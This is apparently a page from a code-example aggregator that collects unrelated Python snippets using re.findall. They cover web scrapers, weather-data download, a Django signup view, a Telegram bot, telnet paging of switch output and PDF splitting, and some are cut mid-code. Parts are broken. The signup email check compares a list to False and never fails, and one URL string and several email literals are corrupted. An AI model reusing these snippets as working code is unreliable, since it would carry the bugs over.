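for (_, key, value) in re.findall(r"<(xmp|pdfx|pdf|xmpMM):(.+)>(.+)</\1:\2>", sample, re.I):
    metadata[key] = value
print(metadata)  # {'CreatorTool': 'LaTeX'}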
Beispiel #45
0
        if result:
            base_sign = base_signs.format(i)
            try:
                driver.find_element_by_xpath(base_sign).click()
            except Exception:
                print("第" + str(count) + "条数据出现超时,尝试再次连接")
                driver.find_element_by_xpath(base_sign).click()
            sleep(1)

            all_hand = driver.window_handles
            driver.switch_to.window(all_hand[-1])

            html = driver.page_source

            shop_name = driver.find_element_by_xpath('//h2').text
            shop_tel = ''.join(re.findall(r'客服电话:(.*?)</p>', html))
            shop_address = ''.join(re.findall(r'联系地址:(.*?)</p>', html))

            result = cursor.execute(sql_shop,
                                    [shop_name, shop_tel, shop_address])
            client.commit()
            if result:
                print("成功添加了" + str(num) + "条数据")
                num += 1
            driver.close()
            driver.switch_to.window(all_hand[0])

    print("第" + str(page) + "页的内容搜集完毕")

    # if goods_salas < 5:
    #     print("日销量5以下,不找啦")
Beispiel #46
0
def youkumovies():
    flag = 0
    boo = False
    countsum = 0
    lg = {
        '内地': '普通话',
        '韩国': '韩语',
        '美国': '英语',
        '俄罗斯': '俄语',
        '比利时': '比利时语',
        '香港': '粤语',
        '台湾': '台语',
        '日本': '日语',
        '其他': '其他',
        '泰国': '泰语',
        '欧洲': '英语',
        '印度': '印度语',
        '英国': '英语',
        '中国': '普通话'
    }
    url = 'http://list.youku.com/category/show/c_96_s_6_d_1_p_%d.html?spm=a2h1n.8251845.0.0'
    for ii in range(0, 29):
        flag += 1
        sum = 0
        print(
            '..........................Adding info from page %d.........................' %
            (flag))
        page = url % (ii)
        req = requests.get(page)
        soup = BeautifulSoup(req.text, 'lxml')
        html = soup.find_all(class_='yk-col4 mr1')
        for n in html:
            sum += 1
            countsum += 1
            print(
                '>>>>>>>>>>>>>>>>>>>>>>>%d items collected in total so far<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<'
                % (countsum))
            print(
                '---------------------Adding page %d, item %d------------------------'
                % (flag, sum))
            if countsum >= 685:
                new_str = str(n)
                new_str = BeautifulSoup(new_str, 'lxml')
                html_str = str(new_str.find_all(class_='p-thumb')[0])
                # print(html_str)
                try:
                    info = re.findall(
                        'class="p-thumb"><a href="(.*?)" target="_blank"',
                        html_str, re.S)
                except IndexError as e:
                    info.append('')
                try:
                    info.append(
                        re.findall('target="_blank" title="(.*?)"></a>',
                                   html_str, re.S)[0].replace('\xa0', ''))
                except IndexError as e:
                    info.append('')
                try:
                    info.append(
                        re.findall('</div><img _src="(.*?)" alt="', html_str,
                                   re.S)[0])
                except IndexError as e:
                    info.append('')
                try:
                    info.append(
                        re.findall('<span class="vip-free">(.*?)</span>',
                                   html_str, re.S)[0])
                except IndexError as e:
                    info.append('')
                if not ('预告' in info[3]):
                    if (len(Movies.objects.filter(moviesname=info[1])) < 1):
                        dan_req = requests.get('http:' + info[0])
                        new_html = dan_req.text.replace('\\n', '').replace(
                            '\n', '').replace('\\', '')
                        try:
                            dan_url = 'https:' + re.findall(
                                'class="bg-dubo"></span>    <a href="(.*?)" target="_blank"',
                                new_html, re.S)[0]
                        except IndexError as e:
                            dan_url = 'https://www.baidu.com'
                        req = requests.get(dan_url)
                        y_html = BeautifulSoup(req.text, 'lxml')
                        try:
                            html_s = str(y_html.find_all(class_='p-base')[0])
                            tv_time = re.findall(
                                '<label>上映:</label>(.*?)</span></li>', html_s,
                                re.S)[0]
                            info.append(tv_time)
                        except IndexError as e:
                            info.append('')
                            html_s = ''
                        try:
                            tv_di = re.findall(
                                '</li><li>地区:.*target="_blank">(.*?)</a></li><li>类型:',
                                html_s, re.S)[0]
                            info.append(tv_di)
                        except IndexError as e:
                            info.append('')
                            tv_di = '其他'
                        try:
                            info.append(lg[tv_di])
                        except KeyError as e:
                            info.append('')
                        try:
                            lei_s = re.findall(
                                '</a></li><li>类型:<a(.*?)</li><li>', html_s,
                                re.S)[0]
                            dan_lei = re.findall('target="_blank">(.*?)</a>',
                                                 lei_s, re.S)
                            z_lei = ''
                            for aa in dan_lei:
                                z_lei += aa
                            info.append(z_lei)
                        except IndexError as e:
                            info.append('')
                        if info[2] != '':
                            movies = Movies(moviesname=info[1],
                                            moviessource='优酷视频',
                                            moviesgrade=info[3],
                                            movieslanguage=info[6],
                                            moviestype=info[7],
                                            moviesdecade=info[4],
                                            moviesregion=info[5],
                                            pdatetime=info[4],
                                            moviesimageurl=info[2],
                                            moviesurl='https:' + info[0],
                                            moviesurl2='[]')
                            movies.save()
                            print(
                                'Successfully added one record+++++++++++++++++++++++++++++++++++++++++++++++++++'
                            )
                        else:
                            print(
                                'Data failed.............................................................'
                            )
                        # print(info[:10])
                    elif len(Movies.objects.filter(moviesname=info[1])) >= 1:
                        print(
                            'This record has already been added!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'
                        )
                        print(info)
                    else:
                        print(
                            'This record has already been added!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'
                        )
                        print(info)
                info.clear()
Beispiel #47
0
def dload_grib_files(grib_files, tropo_model='ERA5', snwe=None):
    """Download weather re-analysis grib files using PyAPS
    Parameters: grib_files : list of string of grib files
    Returns:    grib_files : list of string
    """
    print(
        '\n------------------------------------------------------------------------------'
    )
    print('downloading weather model data using PyAPS ...')

    # Get date list to download (skip already downloaded files)
    grib_files_exist = check_exist_grib_file(grib_files, print_msg=True)
    grib_files2dload = sorted(list(set(grib_files) - set(grib_files_exist)))
    date_list2dload = [
        str(re.findall(r'\d{8}', i)[0]) for i in grib_files2dload
    ]
    print('number of grib files to download: %d' % len(date_list2dload))
    print(
        '------------------------------------------------------------------------------\n'
    )

    # Download grib file using PyAPS
    if len(date_list2dload) > 0:
        hour = re.findall(r'\d{8}[-_]\d{2}',
                          grib_files2dload[0])[0].replace('-',
                                                          '_').split('_')[1]
        grib_dir = os.path.dirname(grib_files2dload[0])

        # try 3 times to download, then use whatever downloaded to calculate delay
        i = 0
        while i < 3:
            i += 1
            try:
                if tropo_model in ['ERA5', 'ERAINT']:
                    pa.ECMWFdload(date_list2dload,
                                  hour,
                                  grib_dir,
                                  model=tropo_model,
                                  snwe=snwe,
                                  flist=grib_files2dload)

                elif tropo_model == 'MERRA':
                    pa.MERRAdload(date_list2dload, hour, grib_dir)

                elif tropo_model == 'NARR':
                    pa.NARRdload(date_list2dload, hour, grib_dir)
            except:
                if i < 3:
                    print(
                        'WARNING: download attempt {} failed, retrying.\n'
                        .format(i))
                else:
                    print('\n\n' + '*' * 50)
                    print(
                        'WARNING: downloading failed for 3 times, stop trying and continue.'
                    )
                    print('*' * 50 + '\n\n')
                pass

    # check potentially corrupted files
    grib_files = check_exist_grib_file(grib_files, print_msg=False)
    return grib_files
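The date list above relies on re.findall pulling the 8-digit date (and, for the hour, the trailing two digits) out of each grib file name. A tiny illustration with a made-up file name:

import re

grib_file = 'ERA5_20200101_06.grb'  # hypothetical grib file name
print(re.findall(r'\d{8}', grib_file))           # ['20200101']
print(re.findall(r'\d{8}[-_]\d{2}', grib_file))  # ['20200101_06']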
Beispiel #48
0
def calculate_delay_timeseries(inps):
    """Calculate delay time-series and write it to HDF5 file.
    Parameters: inps : namespace, all input parameters
    Returns:    tropo_file : str, file name of ECMWF.h5
    """
    def get_dataset_size(fname):
        atr = readfile.read_attribute(fname)
        shape = (int(atr['LENGTH']), int(atr['WIDTH']))
        return shape

    # check existing tropo delay file
    if (ut.run_or_skip(out_file=inps.tropo_file,
                       in_file=inps.grib_files,
                       print_msg=False) == 'skip'
            and get_dataset_size(inps.tropo_file) == get_dataset_size(
                inps.geom_file)):
        print(
            '{} file exists and is newer than all GRIB files, skip updating.'.
            format(inps.tropo_file))
        return

    # prepare geometry data
    geom_obj = geometry(inps.geom_file)
    geom_obj.open()
    inps.dem = geom_obj.read(datasetName='height')
    inps.inc = geom_obj.read(datasetName='incidenceAngle')

    if 'latitude' in geom_obj.datasetNames:
        # for dataset in geo OR radar coord with lookup table in radar-coord (isce, doris)
        inps.lat = geom_obj.read(datasetName='latitude')
        inps.lon = geom_obj.read(datasetName='longitude')
    elif 'Y_FIRST' in geom_obj.metadata:
        # for geo-coded dataset (gamma, roipac)
        inps.lat, inps.lon = ut.get_lat_lon(geom_obj.metadata)
    else:
        # for radar-coded dataset (gamma, roipac)
        inps.lat, inps.lon = ut.get_lat_lon_rdc(geom_obj.metadata)

    # calculate phase delay
    length, width = int(inps.atr['LENGTH']), int(inps.atr['WIDTH'])
    num_date = len(inps.grib_files)
    date_list = [str(re.findall(r'\d{8}', i)[0]) for i in inps.grib_files]
    tropo_data = np.zeros((num_date, length, width), np.float32)
    print(
        '\n------------------------------------------------------------------------------'
    )
    print(
        'calculating absolute delay for each date using PyAPS (Jolivet et al., 2011; 2014) ...'
    )
    print('number of grib files used: {}'.format(num_date))

    if not inps.verbose:
        prog_bar = ptime.progressBar(maxValue=num_date)
    for i in range(num_date):
        grib_file = inps.grib_files[i]
        tropo_data[i] = get_delay(grib_file, inps)

        if not inps.verbose:
            prog_bar.update(i + 1, suffix=os.path.basename(grib_file))
    if not inps.verbose:
        prog_bar.close()

    # remove metadata related with double reference
    # because absolute delay is calculated and saved
    for key in ['REF_DATE', 'REF_X', 'REF_Y', 'REF_LAT', 'REF_LON']:
        if key in inps.atr.keys():
            inps.atr.pop(key)

    # Write tropospheric delay to HDF5
    ts_obj = timeseries(inps.tropo_file)
    ts_obj.write2hdf5(data=tropo_data, dates=date_list, metadata=inps.atr)
    return inps.tropo_file
Beispiel #49
0
def signup(request):
    if request.method == 'POST':
        username = request.POST['username']
        password1 = request.POST['password']
        password2 = request.POST['repassword']
        email = request.POST['email']
        phone = request.POST['phone']
        address = request.POST['address']
        city = request.POST['city']

        try:
            prime = request.POST['prime']
            if prime == "on":
                prime = True
        except:
            prime = False
        state = request.POST['state']
        image = request.FILES['image']

        if User.objects.filter(username=username).exists():
            messages.error(request, 'Username already taken')
            return redirect('/user/signup/')

        elif re.findall(r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$",
                        email) == False:
            messages.error(request, 'Invalid Email')
            return redirect('/user/signup')

        elif User.objects.filter(email=email).exists():
            messages.error(request, "Email already taken")
            return redirect('/user/signup/')

        elif not phone.isnumeric():
            messages.error(request, "Invalid phone number")
            return redirect('/user/signup/')

        elif city.isalnum() and not city.isalpha():
            messages.error(request, "Invalid city name")
            return redirect('/user/signup/')

        elif password1 != password2:
            messages.error(request, "Password not matched")
            return redirect('/user/signup/')
        else:
            user = User.objects.create_user(username=username,
                                            password=password1,
                                            email=email)
            new_cust = Client.objects.create(user=user,
                                             phone=phone,
                                             address=address,
                                             city=city,
                                             prime=prime,
                                             state=state,
                                             image=image)
            new_cust.save()
            messages.info(request, "You have been added successfully !!")
            auth.login(request, user)
            return redirect("/")

    else:
        return render(request, 'signup.html')
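Since re.findall never returns False, the email check above works by testing whether the match list is empty. A small, hypothetical demonstration of the same pattern (both addresses below are invented):

import re

EMAIL_RE = r"^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$"
for candidate in ("jane.doe@example.com", "not-an-email"):
    print(candidate, "accepted" if re.findall(EMAIL_RE, candidate) else "rejected")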
Beispiel #50
0
def process_command(inputs, message):
    if message.get("text") is not None:
        if message.get("text").startswith("/"):
            # SERVICE MAINTENANCE CHECK
            if function_switch == "OFF":
                print("Service down for maintenance")
                return inputs["serviceDown"]

            print("Current request json {}".format(message))
            command_raw = message.get("text")
            bot_index_identifier = command_raw.find('@')
            if bot_index_identifier != -1:
                if command_raw[bot_index_identifier+1:] != telegram_bot_name:
                    print("Not a command for Amaze bot, input command {}".format(command_raw[bot_index_identifier+1:]))
                    raise ValueError()
                command_raw = command_raw[:bot_index_identifier]
            print("Found a new interaction with amaze bot for message: {}".format(command_raw))
            if inputs and command_raw in inputs:
                # authenticate command permission
                if not is_command_permitted(command_raw, message):
                    print("User not permitted for the command {}".format(command_raw))
                    return inputs["commandNotPermitted"]
                result_command = inputs[command_raw]
                print("Found resultCommand {}".format(result_command))
                command_keyword = re.findall("##.+##", result_command)
                if len(command_keyword) != 0:
                    print("Processing regex {} for result command {}".format(command_keyword[0], result_command))
                    try:
                        return result_command.replace(command_keyword[0], "\n" +
                                                      format_command(inputs, message, command_keyword[0]))
                    except Exception as err:
                        return str(err)
                else:
                    return result_command
            else:
                print("Didn't find resultCommand for {}".format(command_raw))
                message["text"] = "/help"
                return inputs["default"], process_command(inputs, message)
        else:
            # SERVICE MAINTENANCE CHECK
            if function_switch == "OFF":
                print("Service down for maintenance")
                raise ValueError("Unable to handle operation")

            issue_number = re.findall("#\d{4}|#\d{3}", message.get("text"))
            if len(issue_number) != 0:
                print("Current request json {}".format(message))
                print("Found request for issue number {}".format(issue_number[0]))
                return git.parse_issue(issue_number[0][1:])
            elif message.get("text").startswith("## Issue explanation (write below this line)"):
                reporter_from = message.get("from")
                user_name = reporter_from.get("username")
                print("Found reporter {}, message {}".format(reporter_from, message.get("text")))
                return inputs["createissue"].format(git.create_issue(issue_create_uri, issue_token, message.get("text"), user_name))
            else:
                print("Unable to handle operation for chat id {}".format(message.get("chat").get("id")))
                raise ValueError("Unable to handle operation")
    elif message.get("new_chat_member"):
        # SERVICE MAINTENANCE CHECK
        if function_switch == "OFF":
            print("Service down for maintenance")
            raise ValueError("Unable to handle operation")
        print("Current request json {}".format(message))
        print("New member added to group: {}".format(message.get("new_chat_member")))
        return inputs["member"].format(message.get("new_chat_member").get("first_name")), inputs["member2"]
Beispiel #51
0
def get_code():
    r = requests.get('https://www.tianyancha.com/', headers=headers)
    code = re.findall(
        r'https://static.tianyancha.com/fonts-styles/css/(.*?)/font.css',
        r.text)[0]
    return code
Beispiel #52
0
def get_kernel(kernels_raw):
    for kernel in re.findall(
            r"kernel.*?\s+(\S+)\s+\S+",
            kernels_raw, re.MULTILINE):
        yield kernel
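Assuming the get_kernel generator above is in scope, a short run against a made-up bootloader listing would look like this:

sample_kernels = ("kernel /boot/vmlinuz-5.4.0 ro root=/dev/sda1\n"
                  "kernel /boot/vmlinuz-5.8.0 ro quiet")
print(list(get_kernel(sample_kernels)))
# ['/boot/vmlinuz-5.4.0', '/boot/vmlinuz-5.8.0']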
for video in folders:
    images = os.listdir(os.getcwd() + '/' + str(video))
    current_path = os.getcwd() + "/" + str(video)
    for i in images:
        image_file_name = current_path + "/" + i
        img = cv2.imread(image_file_name, 0)
        faces = face_cascade.detectMultiScale(img, 1.3, 5)
        print(faces)
        t_h,t_w = img.shape
        for f in faces:
            x, y, w, h = f
            #drop face if it is smaller than 40 px
            if w < 40 or h < 40:
                continue
            # drop face if it is relatively too small on screen
            if float(w) / float(t_w) < ratio or float(h) / float(t_h) < ratio:
                continue
            cv2.rectangle(img, (x,y), (x+w,y+h), (255,255,255))
            sub_face = img[y:y+h, x:x+w]

            resize_face = cv2.resize(sub_face, (48, 48))
            resize_face = cv2.equalizeHist(resize_face)

            id = re.findall(r'\d+', str(i))[0]

            face_file_name = current_path + "/" + str(id) + "face.jpg"
            cv2.imwrite(face_file_name, resize_face)
            print("saved" + face_file_name)

        #remove image file
        #os.remove(image_file_name) ##uncomment to clean !
import re

pattern = r'[^@ ]+@[^@]+\.[^@]{3}'
com = re.compile(pattern)
string = '[email protected] [email protected] Raj@gmail [email protected]'
obj = re.findall(pattern, string)
if obj:
    print(obj)
else:
    print("no match found")
Beispiel #55
0
# -*- coding: utf-8 -*-
"""
Created on Fri Mar 20 18:17:41 2020

@author: kisku
"""

import re

"""
a. digit at the beginning of the string and a digit at the end of the string
b. A string that contains only whitespace characters or word characters
c. A string containing no whitespace characters """


# sample input; the string below is made up purely for illustration
text = "3 regex tasks to solve by 2020"

# a. digit at the beginning of the string and a digit at the end of the string
print(re.findall(r"^\d.*\d$", text))

# b. a string that contains only whitespace characters or word characters
print(re.findall(r"^[\w\s]+$", text))

# c. a string containing no whitespace characters
print(re.findall(r"^\S+$", text))
Beispiel #56
0
os.chdir("L:\MitchumLab\Individual Lab Folders\XunliangLiu\CLAVATA_project\Infection_BIK_WT_2")
def filetype(fn):
	if '.' in fn:
		return fn.split('.')[-1]
	else:
		print (fn, "is not a file name!")
		return -1
	
	
for root, dirs, files in os.walk('.'):
  for f in files:
    fext = filetype(f).lower() if filetype(f) != -1 else ''
    
    if fext == 'tif' or fext == 'tiff':
      ## use 2-digit plate# instead of 1-digit
      if re.findall(r"R\dP\d[ABC]\dT\d", f):
        newfn = "P0".join(f.split('P'))
        os.rename(root + '/' + f, root + '/' + newfn)
        print ("!!! Rename... ", f, "to", newfn)
      
      ## if the file name ends with '_', add a number at the end
      if f.split('.')[-2][-1] == '_':
        s=1
        while True:
          jnt = '_' + str(s)
          newfn = jnt.join(f.split('_'))
          if newfn not in files:  # if the file name already exists, increment the file number
            os.rename(root + '/' + f, root + '/' + newfn)
            break
          print ("filename ", newfn, "exist")
          s = s+1
Beispiel #57
0
 def command_get_output(self):
     self.__command_output_list = []
     tn = self.__tn
     # send CTRL+Z first to drop back to the initial prompt
     tn.write(b'\32\n')
     try:
         # brute-force our way into system mode: send both the Cisco and Huawei commands so any device ends up there
         # try to enter system view by sending the login command
         tn.write(('system-view' + "\n").encode('utf-8'))
         # send the enable command
         tn.write((self.__enable_command + "\n").encode('utf-8'))
     except:
         pass
     # send a command so the device's system-mode prompt tag (sysmodtag) can be captured
     tn.write(self.__command_output_more_input_command.encode('utf-8'))
     # wait one second for the command output
     time.sleep(1)
     #print(tn.read_very_eager())
     sysmodtag = (re.findall(
         r'#|]',
         tn.read_very_eager().decode('utf-8'))[0]).encode('utf-8')
     print('!!!!!!!!!!!!', 'sysmodtag is:', sysmodtag, '!!!!!!!!!!!!!!')
     tn.write(self.__command_output_more_input_command.encode('utf-8'))
     # show the command about to be sent
     print('Input command:', self.__command_input)
     # send the command
     tn.write((self.__command_input + '\n').encode('utf-8'))
     # store the command output in response; the first two reads return empty data rather than the expected output
     #time.sleep(0.5)
     response = tn.read_very_eager()
     #print('########', response, '##############')
     # if sysmodtag appears in response the output is complete; otherwise keep paging until it is
     while sysmodtag not in response:
         # output not finished yet: send the "more" keystroke to request the next page
         tn.write(self.__command_output_more_input_command.encode('utf-8'))
         # read the next chunk into response and watch for the end-of-output prompt
         #response = tn.read_until(self.__command_output_more_tag_prompt, timeout=0.5)
         response = tn.read_very_eager()
         # print('@@@@@@@@@@@@@@@@@', response, '@@@@@@@@@@@@@@@')
         # copy the chunk into response_format
         response_format = response
         # decode response_format
         response_format = response_format.decode('utf-8')
         # print(response_format)
         # clean up response_format
         response_format = re.sub(r'-- \x08.*\x08', '', response_format)
         response_format = re.sub(r'          ', '',
                                  response_format)
         response_format = re.sub(r'\s----.*16D', '', response_format)
         response_format = re.sub(r'.*16D\s*.*16D', '', response_format)
         response_format = re.sub(r' ----', '', response_format)
         response_format = re.sub(r'                ', '', response_format)
         response_format = re.split(r'\r\n', response_format)
         # drop the redundant pager-prompt lines from the output
         for item in response_format:
             if self.__command_output_more_tag_prompt.decode(
                     'utf-8') in item:
                 response_format.remove(item)
         # append the cleaned output lines to the list
         for item in response_format:
             print(item)
             self.__command_output_list.append(item)
         time.sleep(1)
         # progress hint while the output is being fetched
         # print(response_format)
         # print('Getting command output, please wait.',  n, 'lines command output had gotten.')
     # report completion once the full command output has been collected
     print('All command output has been collected!')
     # the code below is no longer used, but is kept in case it becomes useful again
     #else:
     #    print(2229)
     #    response_format = response
     #    print(response_format)
     #    response_format = response_format.decode('utf-8')
     #    response_format = re.split(r'\r\n', response_format)
     #    for item in response_format:
     #        print(item)
     # the code above is no longer used, but is kept in case it becomes useful again
     # remove the leftover pager-prompt lines that are not part of the command output
     for item in self.__command_output_list:
         if self.__command_output_more_tag_prompt.decode('utf-8') in item:
             self.__command_output_list.remove(item)
     return self.__command_output_list
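The heart of the method above is the paging loop: keep sending the "more" keystroke and reading until the device prompt tag shows up again. A stripped-down sketch of that idea, with made-up defaults for the keystroke and prompt rather than the class's actual configuration:

import re
import time
import telnetlib

def read_until_prompt(tn, more_key=b' ', prompt=b'#'):
    """Page through command output until the prompt byte appears."""
    collected = b''
    while prompt not in collected:
        tn.write(more_key)            # ask the device for the next page
        time.sleep(1)                 # give it a moment to respond
        collected += tn.read_very_eager()
    # split on CRLF and drop empty lines, mirroring the cleanup above
    return [line for line in re.split(r'\r\n', collected.decode('utf-8', 'ignore')) if line]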
Beispiel #58
0
	def f(self):

		for i in range(0,1000,100):

			if (int(self.maxP.encode('utf-8'))<=i):
				pageSize = i
				break

		n_papers= 0                      #to count normalized papers.
		sum_citations= 0  
		counter = 0   
		ncounter = 0
		acounter= 0
		bcounter= 0            # to count the total number of citations an author received.

	#{ looping through pages to get all the publications
		for j in range(0,pageSize, 100):

			S_url=self.url + "&cstart=" + str(j) +"&pagesize=100"

			with urllib.request.urlopen(S_url) as my_url:

				page_html = my_url.read()
			
			page_soup = soup(page_html, "html.parser")

			if (j == 0):
				Name= page_soup.find('div', {'id': 'gs_prf_in'})


			aTag = page_soup.findAll('td', {'class': 'gsc_rsb_std'})

			Titles = page_soup.findAll('td', {'class': 'gsc_a_t'})

			Citations_soup = page_soup.findAll('td', {'class': 'gsc_a_c'})

			Years = page_soup.findAll('td', {'class': 'gsc_a_y'})

			info_page = page_soup.findAll('a', {'class' : 'gsc_a_at'})

			authors_soup= page_soup.findAll('div', {'class': 'gs_gray'})

		#{ loop to get all the pop up urls and then collect number of co-authors from there
			for author in info_page:

				Author_names_link = author["data-href"]

				user=Author_names_link[53:65]


				n_input=Author_names_link[-12:]

				n_author_url="https://scholar.google.com.au/citations?user="******"&hl=en#d=gs_md_cita-d&u=%2Fcitations%3Fview_op%3Dview_citation%26hl%3Den%26user%3D"+user+"%26citation_for_view%3D"+user+"%3A"+n_input+"%26tzom%3D-330"
				N_author_url.append(n_author_url)

			less_authors_name=[]
			for a in authors_soup:
				less_authors_name.append(a.text)

			for i in range(0, len(less_authors_name), 2):
				author_names_list.append(less_authors_name[i])


			for title in Titles:
				Title = title.a.text
				x=Title.encode('utf-8')
				title_list.append(x.decode('utf-8', 'ignore'))
				#title_list has all the titles
			
			for c in Citations_soup:
				p= c.text.encode('utf-8')
				r=p.decode('utf-8', 'ignore')
				q= re.findall('[0-9]+',r)
				Citations.append(q)

		n_author_names_list= []

		for j in author_names_list:
			if '...' not in j:
				n_author_names_list.append(author_names_list[counter])
				counter+=1
				continue
			else:
				n_author_names_list.append('#')
				url_to_counter.append(counter)
				counter+= 1

		if len(url_to_counter) != 0:
			driver= webdriver.Firefox()
			driver.implicitly_wait(0.2)
			for url in url_to_counter:
				print (url)
				print (N_author_url[url])
				driver.get(N_author_url[url])
				time.sleep(0.5)
				title= driver.find_elements_by_xpath('//div[@class="gsc_vcd_value"]')
				page_element = title[0].text
				print (page_element)
				coAuths.append(len(page_element.split(',')))
			driver.quit()

		for name in n_author_names_list:
			if (name=='#'):
				number_of_coauths.append(coAuths[acounter])
				acounter+=1
			else:
				number_of_coauths.append(len(name.split(',')))

		for entry in Citations:
			try:
				newCitations.append(entry[0])
			except:
				newCitations.append(0)
					#newCitations has all the citations as a list



		
		for element in range(len(title_list)):
			n_papers +=1/number_of_coauths[element]

			n_citations.append(int(int(newCitations[element])/number_of_coauths[element]))

		for k in newCitations:
			try:
				sum_citations+= int(k[0])
			except:
				continue

		#print ('a', title_list)
		#print('b', newCitations)
		#print('c', number_of_coauths)
		#print('d', n_citations)
		#print('e', int(n_papers))
		#print('f', int(sum(n_citations)))
		#print('g', int(sum(n_citations)/ len(title_list)))


		
		for entity in range(len(title_list)):
			a= Author(Title_name= title_list[entity], Citations=newCitations[entity], 
				CoAuthors= number_of_coauths[entity], Normalized_citations= n_citations[entity]
				)
			a.save()

		normalized_papers= int(n_papers)
		total_normalized_citations= int(sum(n_citations))
		#normalized_h_index= int(sum(n_citations)/len(title_list))

		nn_citations= n_citations[0:normalized_papers]
		nn_citations.sort(reverse= True)

		for i in nn_citations:
			ncounter+= 1
			print (ncounter, i)
			if(ncounter> i):
				normalized_h_index= ncounter-1
				break




		return (normalized_papers, total_normalized_citations, normalized_h_index)
Beispiel #59
0
def get_external_ip():
    url = 'http://checkip.dyndns.org'
    requesty = urllib.request.urlopen(url).read().decode('utf-8')
    externalIP = re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', requesty)
    return externalIP
    pdf_merger.append(firstpdf)
    pdf_merger.merge(insertpage, secondpdf)
    # # add a bookmark
    # pdf_merger.addBookmark('This is a bookmark', 1)
    pdf_merger.write('merge_pdf.pdf')

#
# def split_by_num(filename, nums, password=None):
from PyPDF2 import PdfFileReader, PdfFileWriter

filename = r'F:\研一下\量化投资资料\量化教材\Hands-On_Machine_Learning_for_Algorithmic_Trading.pdf'
pdf_reader = PdfFileReader(open(filename, mode='rb'))
pages = pdf_reader.getNumPages()
outline = pdf_reader.getOutlines()
outlinchapter = []
outlinepage = [i+18 for i in [8,33,65,88,119,147,175,224,260,284,312,351,389,418,441,458]]
for o in outline:
    res = re.findall(r"'/Title': '(.*?)', '/Page': IndirectObject\((.*?), 0\)",str(o),re.S)
    if 'Chapter' in res[0][0]:
        outlinchapter.append(res[0][0])
#print(list(outlinedict[0].keys())[0],list(outlinedict[0].values())[0])
outlinedict =[{i[0]:i[1]} for i in zip(outlinchapter,outlinepage)]


for i in range(len(outlinedict) - 1):
    pdf_writer = PdfFileWriter()
    split_pdf_name = list(outlinedict[i].keys())[0].replace(':','') + '.pdf'
    start = list(outlinedict[i].values())[0]
    end = list(outlinedict[i+1].values())[0]
    print(split_pdf_name)
    for page_num in range(int(start), int(end)):
        pdf_writer.addPage(pdf_reader.getPage(page_num))
    with open(split_pdf_name,'wb') as out: